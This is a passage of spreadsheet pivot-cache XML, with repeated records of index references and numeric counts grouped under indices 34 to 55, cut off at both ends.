    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="34"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="34"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="34"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="34"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="34"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="34"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="34"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="34"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="34"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="35"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="35"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="4"/>
    <x v="35"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="35"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="35"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="35"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="35"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="35"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="35"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="35"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="35"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="35"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="35"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="35"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="36"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="36"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="36"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="36"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="36"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="36"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="36"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="36"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="36"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="36"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="36"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="18"/>
    <x v="36"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="36"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="36"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="37"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="37"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="37"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="37"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="37"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="37"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="37"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="37"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="37"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="37"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="37"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="37"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="37"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="37"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="38"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="38"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="38"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="38"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="38"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="38"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="38"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="38"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="38"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="38"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="38"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="40"/>
    <x v="38"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="38"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="38"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="39"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="39"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="39"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="39"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="39"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="39"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="39"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="39"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="39"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="39"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="39"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="39"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="39"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="39"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="40"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="40"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="40"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="40"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="40"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="40"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="11"/>
    <x v="40"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="40"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="40"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="40"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="40"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="40"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="40"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="40"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="41"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="41"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="41"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="1"/>
    <x v="41"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="41"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="41"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="41"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="41"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="41"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="41"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="25"/>
    <x v="41"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="41"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="41"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="41"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="21"/>
    <x v="41"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="42"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="42"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="42"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="1"/>
    <x v="42"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="42"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="42"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="42"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="42"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="42"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="42"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="42"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="42"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="42"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="42"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="43"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="43"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="43"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="43"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="43"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="21"/>
    <x v="43"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="30"/>
    <x v="43"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="43"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="43"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="43"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="9"/>
    <x v="43"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="30"/>
    <x v="43"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="43"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="43"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="44"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="44"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="44"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="44"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="44"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="44"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="44"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="44"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="44"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="44"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="44"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="44"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="44"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="44"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="45"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="45"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="45"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="45"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="45"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="45"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="57"/>
    <x v="45"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="78"/>
    <x v="45"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="45"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="45"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="45"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="45"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="45"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="45"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="21"/>
    <x v="45"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="46"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="46"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="46"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="46"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="46"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="46"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="46"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="46"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="46"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="46"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="46"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="30"/>
    <x v="46"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="46"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="46"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="47"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="47"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="47"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="47"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="47"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="47"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="47"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="15"/>
    <x v="47"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="47"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="47"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="12"/>
    <x v="47"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="47"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="47"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="47"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="48"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="48"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="48"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="48"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="48"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="48"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="48"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="48"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="48"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="48"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="48"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="48"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="48"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="48"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="49"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="49"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="49"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="49"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="49"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="49"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="49"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="49"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="49"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="49"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="49"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="49"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="49"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="49"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="50"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="50"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="50"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="50"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="50"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="50"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="50"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="50"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="50"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="50"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="50"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="6"/>
    <x v="50"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="50"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="50"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="51"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="51"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="51"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="51"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="51"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="51"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="51"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="51"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="51"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="51"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="35"/>
    <x v="51"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="51"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="51"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="51"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="52"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="52"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="52"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="52"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="52"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="52"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="52"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="52"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="52"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="52"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="52"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="19"/>
    <x v="52"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="52"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="52"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="53"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="53"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="53"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="53"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="53"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="53"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="53"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="53"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="53"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="53"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="53"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="53"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="53"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="53"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="54"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="54"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="54"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="1"/>
    <x v="54"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="54"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="54"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="54"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="54"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="54"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="4"/>
    <x v="54"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="50"/>
    <x v="54"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="200"/>
    <x v="54"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="54"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="54"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="55"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="55"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="55"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="55"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="55"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="55"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="55"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="12"/>
    <x v="55"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="55"/>
  </r>
  <r>
